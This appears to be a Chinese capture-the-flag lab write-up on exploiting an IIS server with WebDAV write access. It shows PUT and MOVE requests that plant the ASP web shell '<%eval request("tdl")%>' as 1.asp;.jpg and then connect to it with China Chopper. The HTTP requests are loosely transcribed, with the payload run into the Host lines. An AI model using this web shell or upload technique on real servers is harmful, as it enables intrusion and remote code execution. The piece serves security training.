该漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了

webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

iis scan工具链接

链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54

桂林老兵工具链接:

链接:https://pan.baidu.com/s/1DosFFiPpVQhag7W2BrNDLQ 密码:zfh3

使用iis scan工具链接可以得到 该站点可以put

但是使用桂林老兵无法put数据

一首凉凉。。

尝试用burp抓包修改写入

repeater

修改GET为OPTIONS

查看可执行命令

增加或修改以下
PUT /2.txt HTTP/1.1
Host: 219.153.49.228:端口<%eval request("tdl")%>
返回不是bad request或者404就行

更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg,burp写入

关于iis6.0解析漏洞可看此文:

https://blog.csdn.net/qq_42357070/article/details/81220763

 
更改或增加以下MOVE /1.txt HTTP/1.1
Host: 219.153.49.228:端口
Content-Length: 25
Destination: /1.asp;.jpg<%eval request("tdl")%>

返回401

不影响,菜刀连接,219.153.49.228:端口/1.asp;.jpg  ,密码tdl

根目录有key

done

墨者学院 - IIS写权限漏洞分析溯源相关推荐

  1. 墨者学院-登录密码重置漏洞分析溯源

    墨者学院-登录密码重置漏洞分析溯源 此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码 再给嫌疑人的复制过去, ...

  2. [ 墨者学院 ] 命令执行——Bash漏洞分析溯源

    0x00.题目描述: 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞. 实训目标 1.了解bash: 2.了解Bash远程命令 ...

  3. Iis写权限漏洞认识 2010-10-13 10:47:20

    Iis写权限漏洞认识 2010-10-13 10:47:20 标签:休闲 iis写权限 职场 http://ynhu33.blog.51cto.com/412835/405064 原创作品,允许转载, ...

  4. IIS写权限漏洞和XFF刷票原理

    IIS写权限漏洞 PUT写入漏洞 此漏洞主要是因为服务器开启了webdav的组件导致的 1.扫描漏洞,yes,可以PUT: 2.用老兵的工具上传一句话文件test.txt,然后move改名为shell ...

  5. 墨者学院_phpMyAdmin后台文件包含分析溯源

    墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管 ...

  6. 墨者靶场 初级:Bash漏洞分析溯源

    墨者靶场 初级:Bash漏洞分析溯源 题目 背景介绍 实训目标 解题方向 解题步骤 题目 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命 ...

  7. IIS写权限漏洞原理利用工具手动版

    很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug.八百年遇不到一会,结果前几天不幸碰上了. 用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜 ...

  8. IIS写权限漏洞 (HTTP PUT方法利用)

    该漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav ...

  9. IIS写权限漏洞————HTTP PUT 方法利用

    该漏洞的产生原因来源于服务器配置不当造成, 利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webda ...

  10. 墨者学院-phpMyAdmin后台文件包含分析溯源

    首先拿到题目到点击访问 访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器 账户密码:root   root 点击sql模块 对sql语句进行一个查询 首先查询sql写一句话的权限 我们可 ...

最新文章

  1. Objective-C 自动生成文档工具:appledoc
  2. [转]XPS转JPG转换器
  3. Spring OXM-XStream注解
  4. 【算法学习】网络流模板……
  5. centos6 升级openssh7.0
  6. 习题2.2 数组循环左移(20 分)浙大版《数据结构(第2版)》题目集
  7. 大数据时代,海量数据处理常用思路和方法总结
  8. java计算信息熵_Java计算文本字符的信息熵
  9. PHP使用PHPExcel删除Excel单元格指定列的方法
  10. HTML+CSS技术实现网页滑动门效果
  11. 【光学】Matlab实现色散曲线拟合
  12. 表上作业法-运输问题(Java)
  13. 英语音标真的分得清楚?KK IPA DJ
  14. 获取汉字拼音首字母方法
  15. 消防工程师 8.2 防排烟系统-防烟
  16. 班农注定落得如此下场
  17. 学习OpenCV3 面阵相机标定方法
  18. 【毕业答辩】毕业设计答辩如何答辩?
  19. 学习torchvision.models._dict_
  20. screen显示窗口查看历史输出

热门文章

  1. spss数据预处理步骤_Spss的数据预处理
  2. 佛系程序员的月薪五万指南 -- 作者|李运华
  3. 10-4 linux可视化界面卡住问题等
  4. 数据挖掘案例(1):泰坦尼克号-数据挖掘流程
  5. Word 复制或编辑公式就卡死
  6. 了解计算机PS,PS教程:你应该了解的PS基础绘图工具
  7. LaTeX 有哪些「新手须知」的内容?
  8. esxi查看许可过期_ESXi许可证将在 60 天后过期问题
  9. python数据分析入门到实战 知了课堂 百度云_零基础入门Python数据分析,只需要看懂这一张图,附下载链接!...
  10. Python之pygame安装教程